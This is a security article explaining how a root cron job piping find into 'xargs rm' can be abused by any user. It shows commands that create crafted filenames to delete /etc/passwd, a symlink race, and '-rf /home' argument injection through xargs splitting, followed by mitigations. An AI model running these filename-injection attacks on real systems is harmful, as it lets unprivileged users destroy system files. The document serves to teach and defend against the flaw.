security problems with find xargs rm

introduction

If root has a cron job like this intended to remove old files from a directory

0 0 * * * find /var/tmp -type f -mtime +30 | xargs rm
then there is a danger of non-root users tricking the command into removing the wrong file(s).

The commandline run daily by cron uses

This command works at removing old files - but at the cost of removing the wrong files if any user abuses it. The command runs as root so it has the ability to remove any file on the computer (and possibly remote files). The input to the command is every filename under /var/tmp/ where these filenames can be provided by any user and can consist of practically any value. It is this situation with a command run as root taking input from all users that makes it dangerous.

an alternative view

There is a view that says because the find command only reports files under /var/tmp/ and the rm command acts on what is given it by find this cron job can never remove files outside that directory. In fact I've seen this presented as a "proof".

example 1

Rather than keep the reader in suspense while differing theories are battered together let's proceed straight to an experiment which will show us the reality behind this command.

Any user runs commands such as these:

cd /var/tmp
mkdir -p 'charlie /etc/passwd /chaplin'
cd 'charlie /etc/passwd /chaplin'
touch -t 197001012359 haha
find /var/tmp -type f -mtime +30
The output from find should include this line complete with the spaces that were put in the directory names.
/var/tmp/charlie /etc/passwd /chaplin/haha
That output will be given by the cron command to rm resulting in the removal of files /var/tmp/charlie /etc/passwd /chaplin/haha if they all exist. [1]

examination of proof

The attempt at proving this command safe does not touch at all on the fact that root is taking input from users. It relies on reasoning about the program. (That one line in cron is a program because it is written instruction telling the computer what to do.) It has four parts:

  1. find to list files matching the criteria
  2. xargs to convert standard input into arguments
  3. rm to remove files whose names are given as arguments
  4. pipe (|) to supply the output of find as input to xargs
But the proof only looks at the first part and takes a short cut assuming the rest is unimportant. In fact it's the behaviour of the whole program of four parts that we care about. What's missing is an examination of whether the files reported by find are always the same ones removed by rm.

To ensure the correct files get removed you could do with showing

The above example has the command failing the third of these requirements (because of whitespace included in the names). Programmers know the computer is a stupid thing that does what it is told - right or wrong. In this case some of what it is told comes from any user who writes under /var/tmp and the programmer should be prepared for that.

But the first two requirements are not met either. That means more examples of file removal.

example 2

Any user runs commands such as these:
cd /var/tmp
mkdir -p 'a/b/c/d/e/f/g/h/i/j/k/l/m'
cd 'a/b/c/d/e/f/g/h/i/j/k/l/m'
touch -t 197001012359 passwd
Then at a moment after find has listed that file for removal and before rm has run
cd 'a/b/c/d/e/f/g/h/i/j/k/l'
mv m old-m
ln -s /etc m
and the file that gets removed is /etc/passwd. Performing this change at the right time takes a little work. It's made easier if there is a large directory tree being searched that contains many files to remove as that increases the interval during which the change must be made. A process run by the attacker may monitor the atime of the directories being searched to assist in making the change at a suitable time. [2] Also if an attack fails then provided there is no adverse outcome it can just be set up again for the next regular execution of the command.

limitations

In example 2 we are limited to removing a file with the same name (basename - not including the directory it is in) as the one reported by find so supposing the original command had been

0 0 * * * find /var/tmp -type f -mtime +30 -name \*.txt | xargs rm
we could not use it to remove /etc/passwd.

And provided rm works as advertised example 1 does not allow us to do recursive removal of directories. For that we need to look a deeper.

But it turns out that the rm program from GNU/Linux coreutils reads command-line arguments with the function getopt_long(). That defaults to processing options even after non-options (filenames in this case) have been seen.

225: while ((c = getopt_long (argc, argv, "dfirvIR", long_opts, NULL)) != -1)
If ... the environment variable POSIXLY_CORRECT is set, then option processing stops as soon as a nonoption argument is encountered.
[3] With the default (non POSIXLY_CORRECT) setting a simple name like this will get recursive removal.
/var/tmp/charlie -rf /home /chaplin/haha
If you are free from the above peculiarity (for instance a non-GNU system) recursive removal is a bit harder; but not much.

example 3

So far we have not needed to alter the text strings passed between find and rm.

0 0 * * * find /var/tmp -type f -mtime +30 | xargs rm
Notice that I refer to text strings and not filenames. find outputs filenames but the subsequent parts of the program handle text strings with no meaning until inside rm they are once again treated as filenames.

The key to getting the strings changed lies in xargs. Because of a limit in executing long argument lists (known as E2BIG) xargs will break a very long list at that point and make further executions of rm with the remaining arguments until they are all used. So this example is going to involve lots of text being passed in the pipeline and force multiple executions of rm. [4]

What this gains is more control over rm's execution. We already had

rm /var/tmp/charlie /etc/passwd /chaplin/haha
but in this case we can get the second execution of rm (unlike the first) with options of our choice appearing before the filenames
rm /var/tmp/charlie.......
rm -rf /home/.......
So we see an attacker might want to get "-rf /" or similar at the front of an argument list by placing it at the right point in input to xargs (just after the boundary between different executions of rm). The attacker is helped by the fact that rm is not fussy about arguments and
rm -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf /something
is acceptable. This means an attacker makes long filenames of "-rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf" and finds it easy to get these in the right place for his purpose. [5]

literature

GNU documentation refers to the problem of interpretation seen in example 1 (the security problems described are not unique to the GNU versions of these programs).

the construction

find ... -print | xargs ...

does not cope correctly with newlines or other white space in file names [6]

"Security Considerations for xargs" says
attacker to create files with names of their choice on the filesystem, then xargs is insecure unless the -0 option is used. If a file with the name /home/someuser/foo/bar\n/etc/passwd exists (assume that \n stands for a newline character), then find ... -print can be persuaded to print three separate lines:

/home/someuser/foo/bar

/etc/passwd

...

The only ways to avoid this problem are either to avoid all use of xargs in favour for example of "find -exec" or (where available) "find -execdir", or to use the "-0" option, which ensures that xargs considers file names to be separated by ASCII NUL characters [7]

The problem of a changing filesystem (example 2) is also described:

A problem exists because there is a time gap between the point where find decides that it needs to process the "-exec" action and the point where the /bin/rm command actually issues the unlink() system call to delete the file from the filesystem. ... Once the symbolic link is in place, the attacker has persuaded find to cause the deletion of the /etc/passwd file, which is not the effect intended [8]

Problem 5 in an exam paper seen online asks for an exploit (provided in C) for a cron command using xargs. [9]

mitigations

"-exec rm {} \;" is better than "| xargs rm" because it avoids the reinterpretation of the text being passed into another command. It is fully portable so if you have a version of find lacking other features in this article then "-exec rm {} \;" protects you from two of the three kinds of attack described.

"-execdir" is better than "exec"

GNU find implements a more secure variant of the "-exec" action, "-execdir". The "-execdir" action ensures that it is not necessary to dereference subdirectories to process target files. The current directory used to invoke programs is the same as the directory in which the file to be processed exists [8]

There is a "-0" option to GNU both find and xargs that prevents whitespace in filenames causing confusion. [7]

"-delete" is available in GNU find and avoids the need to call an external program to do the removal at all - a solution that improves safety and efficiency.

Even on old systems there is no excuse for using "| xargs rm" when there are better alternatives and the possibility of an unintended "rm -rf /" has been proved.

what this means for storage

World-writable directories are almost always trouble. You can encourage use of a temporary directory per user (such as ~/tmp/) but when you face working with a shared world-writable directory it would help to have extra options in the storage and not just in the commands used to clean it. That may be the subject of a future article.


footnotes

  1. Solaris rm expects files to exist and in example 1 if /var/tmp/charlie did not exist /etc/passwd would not be removed.

  2. The relatime mount behaviour may interfere with detecting read access unless you are aware of it and set times appropriately.

  3. getopt_long(3) man page

  4. The limit for E2BIG has been a few thousand characters but is around 2625000 characters on the Linux box I just tested and around 327225 on OpenBSD.
    strace -ff -q -e trace=execve perl -e 'open(F,">/tmp/u");close(F); $i=525000 ; system("rm ". (" -rf " x $i) ." /tmp/u")'

    execve("/usr/bin/perl", ["perl", "-e", "open(F,\">/tmp/u\");close(F); $i="...], [/* 99 vars */]) = 0 [pid 9924] execve("/usr/bin/rm", ["rm", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", ...], [/* 99 vars */]) = -1 E2BIG (Argument list too long)

  5. Details of the recursive removal of directories is here.

  6. https://www.gnu.org/software/findutils/manual/html_mono/find.html#Security-Considerations-for-find

  7. https://www.gnu.org/software/findutils/manual/html_mono/find.html#Security-Considerations-for-xargs

  8. https://www.gnu.org/software/findutils/manual/html_mono/find.html#Race-Conditions-with-_002dexec

  9. http://cr.yp.to/2004-494/1209.pdf
version 3
Written by Peter M Allan. 2014 updated 2017
linkedin back to articles